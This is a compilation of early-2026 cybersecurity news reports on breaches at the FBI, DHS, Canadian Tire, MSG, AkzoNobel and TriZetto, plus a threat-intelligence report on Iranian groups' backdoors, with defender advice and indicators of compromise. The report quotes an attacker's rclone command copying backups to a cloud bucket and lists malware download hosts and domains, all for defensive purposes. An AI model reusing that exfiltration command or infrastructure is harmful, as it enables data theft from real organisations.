cyberscoop.com
Written by Tim Starks

The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details.

“The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”

CNN and CBS reported that the suspicious activity targeted a digital system the FBI uses to manage and conduct surveillance, including work related to foreign surveillance warrants, wiretaps and pen registers, which are used to trace phone and computer data like IP addresses and dialed phone numbers.

News broke in 2024 that the Chinese hacking group Salt Typhoon had exploited the U.S. wiretapping system under the Communications Assistance for Law Enforcement Act that law enforcement and intelligence agencies rely upon, but CNN reported that it wasn’t clear if there was a connection between the 2024 and recent suspected incidents.

It also wasn’t clear when the incident occurred, or who was responsible.

The FBI, like virtually every federal agency, is no stranger to being targeted or infiltrated by hackers.

In 2023, the FBI said it had isolated and contained a cyber intrusion in its New York Field Office. In 2021, hackers exploited a misconfigured FBI server to send hoax emails, although the bureau said its own systems weren’t affected.

Congress, former agents and others have raised concerns about the FBI’s cyber capabilities among budget cuts and the loss of personnel under the second Trump administration. Brett Leatherman, leader of the bureau’s cyber division, told CyberScoop recently that it has suffered no diminishment of its ability to respond to threats and incidents.

Tim Starks

| TechCrunch techcrunch.com
Lorenzo Franceschi-Bicchierai
8:11 AM PST · March 2, 2026

A group of hacktivists calling themselves “Department of Peace” claimed to have hacked the Department of Homeland Security (DHS), leaking allegedly stolen documents online.

On Sunday, the nonprofit transparency collective DDoSecrets published data relating to contracts between DHS, Immigration and Customs Enforcement (ICE), and more than 6,000 companies, including defense contractors Anduril, L3Harris, Raytheon, and surveillance enabler Palantir, as well as tech giants Microsoft and Oracle.

The hacktivist said the data comes from the Office of Industry Partnership, a unit within DHS that procures technology from the private sector.

DHS and ICE did not immediately respond to a request for comment.

Department of Peace explained their motives in a document alongside the hack, citing the recent killings of two peaceful protesters, U.S. citizens Alex Pretti and Renée Good, earlier this year in Minneapolis by federal agents.

“Why hack the DHS? I can think of a couple Pretti Good reasons! I’m releasing this because the DHS is killing us and people deserve to know which companies support them and what they’re working on,” the hackers wrote.

Since the beginning of the Trump administration, DHS and federal immigration agents with ICE have undertaken a campaign of mass deportations, arresting people with largely no criminal records, and detaining them in overcrowded facilities where critics say they are held in inhumane conditions. The mass deportation campaign has been aided by several tech companies, with Palantir at the forefront.

Security researcher Micah Lee organized the leaked data on a dedicated website, making the information easily searchable.

The site shows the name of the contractors, the amount of money they were awarded, as well as contact information, such as full names, email addresses, and phone numbers.

The largest contracts by total money awarded included $70 million for Cyber Apex Solutions, a company that claims on its barebones website to be “focused on filling the security gaps of critical infrastructure” in the U.S.; and $59 million for Science Applications International Corporation (SAIC), which provides AI services for government agencies. Underwriters Laboratories was awarded $29 million to provide testing, certification, and market intelligence to customers.

Cyber Apex Solution, SAIC, and Underwriters Laboratories did not immediately respond to a request for comment.

This story was updated to clarify that Palantir enables, not provides, surveillance for the government.

| SECURITY.COM
5 Mar 2026

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.
Threat Intelligence
5 Mar 2026
23 Min Read
Share
Activity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S. companies. The activity began in February 2026 and has continued in recent days.
A U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the targets.
We round up details of recent Iranian cyber threat activity and what defenders need to look out for.

The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region.

A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity.

A previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost of this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute. This backdoor was signed with a certificate issued to “Amy Cherne”.

There was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage bucket. It’s not clear if this was successful.

rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x

A different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used previously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company:

gitempire.s3.us-east-005.backblazeb2.com

elvenforest.s3.us-east-005.backblazeb2.com

The Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which downloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the networks of the U.S. companies.

While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations could still be vulnerable to attack.

Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA has said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.

Context
On February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran, leading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1 when a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple civilians, were also killed in strikes.

In retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including targeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.

Because of the heated tension in the region and ongoing attacks, it is likely Iran and its allies may also initiate cyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive cyberattacks, including against each other. While internet access in Iran may be disrupted by current military operations, there are cyber operatives working for the regime based in other countries.

The UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state and Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity” and warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that the Handala threat group (see below) has been using the Starlink satellite network to stay online even before this most recent activity began, with the group reportedly leveraging the technology since mid-January, when a nationwide Internet shutdown was announced by Iran’s government.

Examining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us predict the kinds of cyber operations we may see being executed as this conflict continues.

Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to accounts or sensitive information.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

Other recent activity
Doxing Israeli officials and regional energy sector participants
Handala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have been active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities perceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive attacks, including the use of custom wipers. The group operates a leaks site where victim names are posted alongside stolen data and messages from the group. The group was also reportedly active on multiple underground cybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more active on Telegram channels and X (formerly Twitter).

In December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said they had stolen from the phones, including the contact information of prominent Israeli officials, journalists and business people, photos and videos. However, analysis by researchers disputed some of these claims, saying that the attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.

In February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in March 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy, exfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project details. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post on its leaks site. However, the documents shared appeared to consist of older files that were already in circulation previously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially representing an influence or psychological operation intended to generate attention, panic or reputation damage. The group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next target.

Spearphishing academics and NGOs for intelligence collection
In an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a compromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the Middle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage campaign.

The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix. The command & control (C&C) server also reportedly hosted the PDQ remote access tool, which was used for remote access and persistence, as well as a custom browser credential stealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for the purposes of longer-term espionage and exfiltration.

Elsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the Middle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious spear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy program at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of her name - “Suzzane Maloney.”. In the attacks, the actors started out using a benign email, which eventually led to a subsequent email that contained a malicious link to a remote access tool payload. It is likely these attacks were carried out as a means to perform espionage - more specifically, as a means to gather intelligence that could be leveraged for strategic advantage.

These attacks had TTP overlaps with other Iranian aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming Kitten) but were subsequently attributed to Seedworm.

Other 2025 activity
Camera scanning for intelligence gathering
Marshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is reportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations against countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging data leaks in order to control and shape narratives using wiper and fake ransomware malware.

In June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian actors.

In previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing damage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely these attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and potentially enable follow-on targeting of high value targets.

Additionally, in June 2025, a successful password-spraying attack conducted from Nord VPN infrastructure against Israeli municipal government entities was reported followed by spear-phishing attacks that contained links to a ClickFix page designed to trick users into executing malicious PowerShell to ultimately deliver a remote access tool (RAT) that can execute arbitrary commands by the attackers. It is likely the motive behind these attacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the targeting of Israeli targets points to an Iranian actor as the most likely perpetrator.

DieNet DDoS attacks
DieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its intention to target “outlaw sites and corrupt government platforms” using DDoS attacks.

Following the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility for multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government, transit and communication systems.

In its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure, including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website defacements and data breaches.

Based on reporting, its motives were likely political retaliation and service disruption.

What can we expect next?
Given Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns combining high-visibility disruption for political signaling and lower-visibility access operations for strategic leverage.

Defenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting government, transportation, energy and defense contractors to amplify psychological and economic pressure.

It is also likely that more capable state-aligned groups will continue credential harvesting operations, along with vulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while also positioning themselves for potential future destructive, espionage or coercive operations.

DDoS and defacements
Given the increase in "hacktivist" activity, we predict a surge in DDoS and defacements for fast signaling and media impact, similar to what has been observed recently with Handala’s claims of targeting critical national infrastructure (CNI).

It is likely such attacks would target a range of sectors, including government portals, municipal sites, airports/ports, logistics providers, banks, telcos, media and symbolic brands.

Password spraying and mailbox compromises
Over the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and mailbox compromises as a means of initial access and intelligence gathering.

Targets could include defense organizations, government, contractors and NGOs. Additionally, adjacent organizations that support base operations, including fuel, catering, logistics, and communications could also be targets of these attacks.

Leaks / intimidation operations / psyops
Hacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only partial - this is key escalation behavior.

Potential targets of these kinds of attacks and claims would likely include healthcare, local government, airports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media.

Critical infrastructure and opportunistic attacks
Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities.

Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.

Destructive attacks
Iran has previously exhibited high capabilities in destructive potential, particularly during escalation windows.

Any attacks would likely to be focused on energy and utilities, transportation and logistics, financial sector, telecoms, healthcare, defense contractors and military suppliers.

How can defenders prepare?
Organizations should prepare by focusing on strengthening monitoring capabilities and ensure resilience across their infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and reconnaissance activity often provide an opportunity for defenders to detect intrusion attempts early in the attack chain.

DDoS and defacement campaigns
Due to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt public-facing services and monitor any internet-facing infrastructure for the following:

Spikes in HTTP requests from large, distributed IP ranges
Repeated probing of admin portals
Exploit attempts targeting web frameworks and content management systems
Scanning activity against exposed API endpoints
To prepare, organizations should look at performing the following:

Deploy web application firewalls (WAF) with updated rule sets
Enable DDoS protection via CDN or upstream filtering services
Decommission any non-essential or unused publicly accessible services
Ensure all up-to-date patches for web applications/plugins are applied regularly
Ensure website backups exist for rapid restoration, if required
Monitor underground forums, Telegram channels and social media for claims involving your organization
Credential attacks
Credential attacks are one of the most common initial access techniques used by Iranian-linked groups, which include attack attempts against multiple public-facing services.

Defenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts, such as the following:

Repeated login failure attempts across multiple users
Authentication attempts from unusual geographic locations
MFA fatigue attacks
Login attempts occurring outside of normal working hours
Vulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure
Deployment of web shells on internet-facing servers
Credential harvesting through phishing campaigns
Organizations should review and harden any identity security mechanisms by performing the following:

Enable multi-factor authentication for all remote access
Disable legacy authentication protocols
Implement condition access policies based on location and device risk
Restrict admin logins to specific locations, where possible
Monitor identity provider logs for any anomalies
Leak campaigns and intimidation operations
Hacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological pressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators of data staging or exfiltration, such as the following:

Unusual downloads from email systems
Unusual access to document repositories
Suspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple file types
Large outbound data transfers to external cloud storage platforms
Unexpected use of data-transfer applications (e.g. Rclone) in their environment
Organizations should focus on ensuring monitoring is in place for the following:

Large outbound data transfers
Implement data loss prevention (DLP) policies
Restrict access to external cloud storage platforms
Enable auditing of email and file access
Having a communications plan for potential leak claims can also help organizations respond quickly to these threats.

Attacks on critical infrastructure
Critical infrastructure organizations and companies that support military logistics may face attacks that attempt to compromise the following:

Operational Technology (OT) interfaces
Scheduled and logistics systems
Contractor networks
Remote management systems
Security teams should ensure adequate monitoring is in place for:

Abnormal access to ICS
Unexpected remote connections to operational networks
Authentication attempts targeting infrastructure management systems
Unusual configuration changes in critical systems
Vendor access and contractor networks
Organizations faced with these attacks, at a minimum, should ensure:

Network segmentation across operational technology networks
Restrict remote access to infrastructure systems
Monitor contractor VPN access
Maintain offline backups of critical configuration systems
Destructive attacks
Iran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which targeted Saudi Arabia's oil industry to wipe thousands of systems.

Organizations that anticipate such attacks should ensure they monitor for indicators that attackers may be preparing for a destructive operation such as:

Mass scheduled task creation
Attempts to disable security applications
Deletion of shadow copies or backup data
Unusual administrative commands executed across multiple hosts
Organizations should prioritize resilience against destructive attacks by conducting the following tasks:

Isolating backup infrastructure from production networks
Enable immutable backups
Test disaster recovery procedures regularly
Ensuring systems can be restored quickly is critical to recovering from the impact of destructive attacks.

Historical activity
Stuxnet
One of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent days. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one of the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in U.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable.

Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against infrastructure that we know nothing about - yet.

Reports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).

Damselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.

Other key actors
Druidfly
Druidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks.

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).

On June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.

Case study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.

Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

HTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks
Use of the remote desktop tools AnyDesk and ScreenConnect
Use of ReGeorg web shells
Damselfly
Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

In 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.

Mantis
Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23), is an Arabic speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations internally within Gaza. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

Indicators of Compromise (IOCs)
0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 - Trojan.Dindoor

1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 - Trojan.Dindoor

2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 - Trojan.Dindoor

2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - Trojan.Dindoor

42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f - Trojan.Dindoor

7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 - Trojan.Dindoor

7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef - Trojan.Dindoor

b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 - Trojan.Dindoor

bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a - Trojan.Dindoor

c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e - Trojan.Dindoor

077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de - Trojan.Fakeset

15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 - Trojan.Fakeset

2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 - Trojan.Fakeset

4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be - Trojan.Fakeset

64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb - Trojan.Fakeset

64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 - Trojan.Fakeset

74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d - Trojan.Fakeset

94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 - Trojan.Fakeset

a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 - Trojan.Fakeset

a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c - Trojan.Fakeset

ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 - Trojan.Fakeset

24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 - Trojan.Stagecomp

A92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 - - Trojan.Stagecomp

3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 - Trojan.Darkcomp

1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 - Trojan.Darkcomp

Network Indicators

gitempire.s3.us-east-005.backblazeb2[.]com

elvenforest.s3.us-east-005.backblazeb2[.]com

uppdatefile[.]com

serialmenot[.]com

moonzonet[.]com

securityweek.com
ByIonut Arghire| February 28, 2026 (6:50 AM ET)

More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire.

The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said.

“The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark’s/L’Équipeur and Party City,” the retail giant announced in October.

Canadian Tire said at the time that the compromised information included names, email addresses, dates of birth, encrypted passwords, and, in some cases, incomplete credit card numbers.

Fewer than 150,000 accounts had date of birth details compromised, the company said.

Canadian Tire also underlined that the password and credit card information could not be used to access users’ accounts or to perform fraudulent transactions and purchases, and that no Canadian Tire Bank information or Triangle Rewards loyalty data was compromised in the incident.

This week, the data set associated with the incident was added to the data breach notification website Have I Been Pwned.

According to the website, roughly 42 million records were compromised in the attack, including 38.3 million email addresses. In addition to the details shared by Canadian Tire, the leaked compromised data also includes addresses, phone numbers, and gender information.

“Passwords were stored as PBKDF2 hashes, and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry, and masked card number),” Have I Been Pwned notes.

Canadian Tire has notified the affected individuals via email but has yet to publicly confirm the number of victims.

securityweek.com
ByEduard Kovacs| March 2, 2026 (8:53 AM ET)

The company is one of the many victims of the 2025 Oracle E-Business Suite (EBS) hacking campaign.

Madison Square Garden has confirmed being impacted by a data breach stemming from a cybercrime campaign targeting customers of Oracle’s E-Business Suite (EBS) solution.

In the Oracle EBS hacking campaign, the Cl0p ransomware and extortion group exploited zero-day vulnerabilities to gain access to data stored by more than 100 organizations in the enterprise management software.

Madison Square Garden (MSG), the world-famous arena located in New York City, was named by the hackers as a victim of the campaign in November 2025.

Data allegedly stolen from the company — more than 210GB of archive files — was leaked by the cybercriminals soon after, indicating that it had refused to pay a ransom.

MSG did not respond to repeated requests for comment at the time. However, it has now confirmed suffering a data breach and it has started notifying individuals whose personal information was compromised as a result of the cybersecurity incident.

According to notifications from MSG Entertainment, the impacted Oracle EBS instance is hosted and managed by a third-party vendor, whose investigation found that hackers stole data in August 2025.

The entertainment company said personal information, including names and SSNs, was compromised.

It’s unclear how many people are affected in total, but MSG Entertainment told the Maine Attorney General’s Office that 11 of the state’s residents are impacted.

bleepingcomputer.com
By Bill Toulas
March 3, 2026

The multinational Dutch paint company AkzoNobel has confirmed to BleepingComputer that hackers breached the network of one of its U.S. sites.

Following a data leak from the Anubis ransomware gang, a company spokesperson said that the intrusion has been contained and that the impact is limited.

“AkzoNobel has identified a security incident at one of our sites in the United States. The incident was limited to the respective site and was already contained,” the company told BleepingComputer.

“The impact is limited, and we are taking the appropriate steps to notify and support impacted parties, and will work closely with relevant authorities.”

AkzoNobel is a major paints and coatings company with 35,000 employees. It has an annual revenue exceeding $12 billion and active operations in over 150 countries. Brands under its corporate umbrella include Dulux, Sikkens, International, and Interpon.

Anubis ransomware claims to have stolen from AkzoNobel 170GB of data, almost 170,000 files, and leaked on its leak site samples that include screenshots of select documents and a list of the stolen files.

The published data contains confidential agreements with high-profile clients, email addresses and phone numbers, private email correspondence, passport scans, material testing documents, and internal technical specification sheets.

At the time of writing, the Anubis leak is only partial. AkzoNobel did not share with BleepingComputer any information on whether it engaged with the threat actor.

Anubis is a ransomware-as-a-service (RaaS) operation that launched in December 2024, offering affiliates 80% of the paid ransoms.

In February 2025, the operators launched an affiliate program on the RAMP forum, boosting its activity and influence in the cybercrime space.

In June the same year, Anubis added to its arsenal a data wiper that destroys the victim’s files to make recovery impossible.

| TechCrunch techcrunch.com
Zack Whittaker
6:28 AM PST · March 6, 2026

Health tech giant TriZetto has confirmed that more than 3.4 million people had personal and health information stolen in a 2024 cyberattack, which the company failed to detect for almost a year.

The tech company, owned by multinational conglomerate Cognizant, serves around 200 million people across 875,000 healthcare providers throughout the U.S., according to its website. Doctors’ offices and healthcare providers use TriZetto to assess patients’ insurance for medical treatments.

TriZetto said in a filing with Maine’s attorney general on Friday that hackers stole patients’ insurance eligibility transaction reports from the company’s servers.

